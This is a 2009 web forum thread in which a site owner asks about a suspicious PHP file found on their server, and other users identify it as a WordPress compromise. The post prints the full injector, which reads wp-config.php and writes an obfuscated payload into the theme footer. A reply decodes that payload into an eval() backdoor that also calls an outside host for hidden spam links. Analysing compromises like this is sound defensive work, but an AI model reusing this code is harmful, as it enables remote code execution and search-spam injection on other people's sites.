vivisick Posted April 30, 2009 Share Posted April 30, 2009 I was wondering if anyone can tell me what this file is. I found it on my web server randomly one day. I don't know much about php, so this seemed like the place to get some help. Here is the code: <? $BASE_DIR = getcwd()."/"; $frame = '<?eval(base64_decode("JGs9MTE0OyRtPWV4cGxvZGUoIjsiLCIyNzsyMDs4Mjs5MDsxOzY7MDsyNzsxOzY7MDs5MDs4Njs0NTszMzs1NTszMjszNjs1NTszMjs0MTs4MDs1ODszODszODszNDs0NTszOTszMzs1NTszMjs0NTs1MTs1Mzs1NTs2MDszODs4MDs0Nzs5NDs4MDsyMTsyOTsyOTsyMTszMDsyMzsxNjsyOTs2OzgwOzkxOzE0OzE0OzE7NjswOzI3OzE7NjswOzkwOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzU4OzM4OzM4OzM0OzQ1OzM5OzMzOzU1OzMyOzQ1OzUxOzUzOzU1OzYwOzM4OzgwOzQ3Ozk0OzgwOzExOzE5OzI2OzI5OzI5OzgwOzkxOzkxOzk7MTI3OzEyMDsxMjM7Mjc7MjA7ODI7OTA7Mjc7MTsxOzIzOzY7OTA7ODY7NDU7MzI7NTU7MzU7Mzk7NTU7MzM7Mzg7NDE7ODA7MzE7MzE7MzE7MTk7MjU7Mjk7NTsyOTsyNzs1OzI5OzU7NjY7NjY7Njc7ODA7NDc7OTE7OTE7OTsyMzsxNzsyNjsyOTs4Mjs4MDs1NTsxMDsyMzsxNzs3OzY7Mjc7Mjk7Mjg7OTI7OTI7OTI7NDY7Mjg7ODA7NzM7MjM7NDsxOTszMDs5MDs4Njs0NTszMjs1NTszNTszOTs1NTszMzszODs0MTs4MDszMTszMTszMTsxOTsyNTsyOTs1OzI5OzI3OzU7Mjk7NTs2Njs2Njs2Nzs4MDs0Nzs5MTs3MzsxNTsxMjc7MTIwOzEyMzs4Njs3OzA7MzA7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7ODA7MjY7Njs2OzI7NzI7OTM7OTM7MTc7Mjk7MzA7MTY7MTE7MTk7NjsyOTsyODs2OzE5OzA7Mjc7Mjk7OTI7MTc7Mjk7MzE7OTM7MzA7Mjc7Mjg7MjU7MTs5Mzs4MDs5MjswOzE5OzI4OzIyOzkwOzY2Ozk0OzY0OzcxOzY2OzkxOzkyOzgwOzkyOzY7MTA7Njs3NzsyNzsyOzc5OzgwOzkyOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzMyOzU1OzYzOzYxOzM4OzU1OzQ1OzUxOzU0OzU0OzMyOzgwOzQ3OzkyOzgwOzg0OzI2OzI5OzE7Njs3OTs4MDs5MjswOzE5OzU7NzswOzMwOzIzOzI4OzE3OzI5OzIyOzIzOzkwOzg2OzQ1OzMzOzU1OzMyOzM2OzU1OzMyOzQxOzgwOzU4OzM4OzM4OzM0OzQ1OzU4OzYxOzMzOzM4OzgwOzQ3OzkxOzkyOzgwOzg0OzE5OzIxOzIzOzI4OzY7Nzk7ODA7OTI7MDsxOTs1Ozc7MDszMDsyMzsyODsxNzsyOTsyMjsyMzs5MDs4Njs0NTszMzs1NTszMjszNjs1NTszMjs0MTs4MDs1ODszODszODszNDs0NTszOTszMzs1NTszMjs0NTs1MTs1Mzs1NTs2MDszODs4MDs0Nzs5MTs3MzsxMjc7MTIwOzEyMzsyNzsyMDs4Mjs5MDsyMDs3OzI4OzE3OzY7Mjc7Mjk7Mjg7NDU7MjM7MTA7Mjc7MTs2OzE7OTA7ODA7MTc7NzswOzMwOzQ1OzI3OzI4OzI3OzY7ODA7OTE7OTE7ODI7OTsxMjc7MTIwOzEyMzsxMjM7ODY7MTc7MjY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7ODI7Nzk7ODI7NTA7MTc7NzswOzMwOzQ1OzI3OzI4OzI3OzY7OTA7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzUwOzE3Ozc7MDszMDs0NTsxOzIzOzY7Mjk7Mjs2OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzk0OzgyOzQ5OzM5OzMyOzYyOzYxOzM0OzM4OzQ1OzM5OzMyOzYyOzk0OzgyOzg2Ozc7MDszMDs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5MTs3MzsxMjc7MTIwOzEyMzsxMjM7NTA7MTc7NzswOzMwOzQ1OzE7MjM7NjsyOTsyOzY7ODI7OTA7ODY7MTc7MjY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7OTQ7ODI7NDk7Mzk7MzI7NjI7NjE7MzQ7Mzg7NDU7MzI7NTU7Mzg7Mzk7MzI7NjA7Mzg7MzI7NTE7NjA7MzM7NTI7NTU7MzI7OTQ7ODI7Njc7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzUwOzE3Ozc7MDszMDs0NTsxOzIzOzY7Mjk7Mjs2OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzk0OzgyOzQ5OzM5OzMyOzYyOzYxOzM0OzM4OzQ1OzM4OzU5OzYzOzU1OzYxOzM5OzM4Ozk0OzgyOzY1OzY2OzkxOzczOzEyNzsxMjA7MTIzOzEyMzs1MDsxNzs3OzA7MzA7NDU7MTsyMzs2OzI5OzI7Njs4Mjs5MDs4NjsxNzsyNjs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5NDs4Mjs0OTszOTszMjs2Mjs2MTszNDszODs0NTs1NTs2MDs0OTs2MTs1NDs1OTs2MDs1Mzs4Mjs5NDs4Mjs4MDsyMTs4OzI3OzI7ODA7OTE7NzM7MTI3OzEyMDsxMjM7MTIzOzg2OzA7MjM7MTs3OzMwOzY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7NTA7MTc7NzswOzMwOzQ1OzIzOzEwOzIzOzE3OzgyOzkwOzg2OzE3OzI2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzkxOzczOzEyNzsxMjA7MTIzOzEyMzs1MDsxNzs3OzA7MzA7NDU7MTc7MzA7Mjk7MTsyMzs4Mjs5MDs4NjsxNzsyNjs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs5MTs3MzsyMzsxNzsyNjsyOTs4Mjs4NjswOzIzOzE7NzszMDs2OzQ1Ozc7Mjg7Mjc7Mzs3OzIzOzQ1OzI4OzE5OzMxOzIzOzczOzEyMzsxMjc7MTIwOzEyMzsxNTs4MjsyMzszMDsxOzIzOzgyOzk7MTI3OzEyMDsxMjM7MTIzOzg2OzA7MjM7MTs3OzMwOzY7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7Nzk7NTA7MjA7Mjc7MzA7MjM7NDU7MjE7MjM7Njs0NTsxNzsyOTsyODs2OzIzOzI4OzY7MTs5MDs4Njs3OzA7MzA7NDU7NzsyODsyNzszOzc7MjM7NDU7Mjg7MTk7MzE7MjM7OTE7NzM7MjM7MTc7MjY7Mjk7ODI7ODY7MDsyMzsxOzc7MzA7Njs0NTs3OzI4OzI3OzM7NzsyMzs0NTsyODsxOTszMTsyMzs3MzsxMjc7MTIwOzEyMzsxNTsxNTsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>'; //"; $filename = $BASE_DIR."wp-config.php"; function my_fread($filename) { if (@function_exists('file_get_contents')) { $content = file_get_contents($filename); } else { $handle = @fopen ($filename, "r"); $content = @fread ($handle, @filesize ($filename)); @fclose ($handle); } return $content; } function my_exit($message) { @unlink("iiousioduoisfdufiousd.php"); echo "|||".$message; exit; } // ============== get template ======================= require($filename); $mysqlcon = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD) or die(mysql_error()); mysql_select_db(DB_NAME); echo mysql_error(); $res = mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name = 'template'") or die(mysql_error()); $row = mysql_fetch_array($res); $template = $row[0]; if ($template == "") my_exit("no template"); // ============== end of get template ======================= // ============== rewrite template ======================= $template_file = $BASE_DIR."wp-content/themes/".$template."/footer.php"; echo "Got: $template_file\n"; $content = my_fread($template_file); $pos = strpos($content, '<u style="display: none">'); if ($pos !== false) my_exit("already have links"); if (strstr($content,"</body>")) $content = str_replace("</body>",$frame."\n</body>",$content); else if (strstr($content,"</BODY>")) $content = str_replace("</BODY>",$frame."\n</BODY>",$content); else $content .= "\n".$frame; if (!$handle = @fopen($template_file, 'w')) my_exit("can't open template for writing"); if (!@fwrite($handle, $content)) my_exit("can't write to template"); @fclose($handle); my_exit("done"); Link to comment https://forums.phpfreaks.com/topic/156327-solved-random-php-file-found-in-web-directory/ Share on other sites More sharing options...
Kieran Menor Posted April 30, 2009 Share Posted April 30, 2009 The base64 encoded part at the top yields: <?php if(stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") || stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")) { if(isset($_REQUEST["mmmakowoiwow001"])) { echo "Execution...\n"; eval($_REQUEST["mmmakowoiwow001"]); } $url_unique_name = "http://colbyatontario.com/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]); if(function_exists("curl_init")) { $ch_unique_name = @curl_init(); @curl_setopt($ch_unique_name, CURLOPT_URL, $url_unique_name); @curl_setopt($ch_unique_name, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch_unique_name, CURLOPT_TIMEOUT, 30); @curl_setopt($ch_unique_name, CURLOPT_ENCODING , "gzip"); $result_unique_name = @curl_exec($ch_unique_name); @curl_close($ch_unique_name); echo $result_unique_name; } else { $result_unique_name = @file_get_contents($url_unique_name); echo $result_unique_name; } } ?> It basically lets someone run code on your server. Link to comment https://forums.phpfreaks.com/topic/156327-solved-random-php-file-found-in-web-directory/#findComment-823098 Share on other sites More sharing options...
gffg4574fghsDSGDGKJYM Posted April 30, 2009 Share Posted April 30, 2009 Obviously you've got hacked. It's hard to tell exactly how it happen without the full configuration/log and file. My best guess is a security flaw inside WordPress since this php use wordpress item to spam your website. I haven't read it all but it's obfuscated code but it seem to do 2 main things 1- Get statistique from your visitor and send them to http://colbyatontario.com/ 2- Read a file from http://colbyatontario.com/ that containt hidden backlinks and display them on many page if not all in your website/wordpress blog. The backlink file look like this : <u style="display: none"> <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3383&course=1">Download Free Full Hentai Movies</A> <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3386&course=1">Aquamarine If Jewelry Real Tell Vintage</A> <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3387&course=1">Chip Thong Bikinis</A> <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3390&course=1">Asian Porn Movie Post</A> <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3396&course=1">Hot Celeb Sex Videos</A> .... It's primary goal is probably hack many wordpress website with that and getting ton of backlinks to cheat search engine into getting high rank for others website. You will have to update your wordpress to the lastest version and check frequently to be sure you haven't been hacked again. Maybe upgrade apache/php/mysql version to the lastest too with all security patch or ask your hosting to do it. Always backup your data. Link to comment https://forums.phpfreaks.com/topic/156327-solved-random-php-file-found-in-web-directory/#findComment-823099 Share on other sites More sharing options...
vivisick Posted April 30, 2009 Author Share Posted April 30, 2009 Thank you for the information. I will let my host know at once. You have been very helpful. Link to comment https://forums.phpfreaks.com/topic/156327-solved-random-php-file-found-in-web-directory/#findComment-823101 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.